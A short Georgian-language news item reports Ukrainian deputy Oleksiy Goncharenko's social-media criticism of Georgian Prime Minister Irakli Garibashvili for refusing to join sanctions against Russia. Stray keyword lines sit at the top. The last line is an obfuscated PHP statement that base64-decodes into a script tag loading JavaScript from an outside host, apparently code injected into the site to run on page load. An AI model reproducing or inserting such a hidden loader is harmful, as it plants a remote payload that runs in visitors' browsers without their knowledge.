celsiusi
ავერსი საქკაბელი
რადას დეპუტატი ალექსეი გონჩარენკო სოციალურ ქსელში ირაკლი ღარიბაშვილს პასუხობს. 
 
"საქართველომ რუსეთის წინააღმდეგ დაწესებულ სანქციებს მხარი არ დაუჭირა. სტოკჰოლმის სინდრომმა შეგიპყროთ? პრემიერმინისტრი ირაკლი ღარიბაშვილი ამბობს, რომ სანქციები მის ქვეყანას სერიოზულ ზიანს მოუტანს. პარლამენტიც კი არ იკრიბება ამის განსახილველად.
 
ყველაზე მეტად კი უბრალო შეკითხვაზე გაცემულმა პასუხმა გამაოცა - აპირებდა თუ არა ირაკლი ღარიბაშვილი კიევში სოლიდარობის ნიშნად ჩამოსვლას? პრემიერმა უპასუხა, რომ უკრაინის ცა დაკეტილია.
 
არაუშავს ირაკლი, როდესაც ომი მორჩება და ჩვენს ცაზე, სამხედროს მაგივრად, სამგზავრო თვითმფრინავები იფრენენ, შეგიძლია მერეც არ ჩამოხვიდე
 
ქართველებო, ძმებო, ეს როგორ მოგწონთ? დაგავიწყდათ, როგორ ჩამოფრინდა უკრაინის პრეზიდენტი, როდესაც 2008 წელს რუსული ტანკები თბილისისკენ მოდიოდნენ? მოითმენთ თუ საჯაროდ აუხსნით ღარიბაშვილს რა უნდა გააკეთოს?" წერს რადას დეპუტატი ალექსეი გონჩარენკო სოციალურ ქსელში.
 
შეგახსენებთ, რომ საქართველოს პრემიერმა დღეს ღიად განაცხადა, რომ საქრათველო რუსეთის წინააღმდეგ დაწესებულ სანქციებს არ უერთდება. 
 
 
705
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");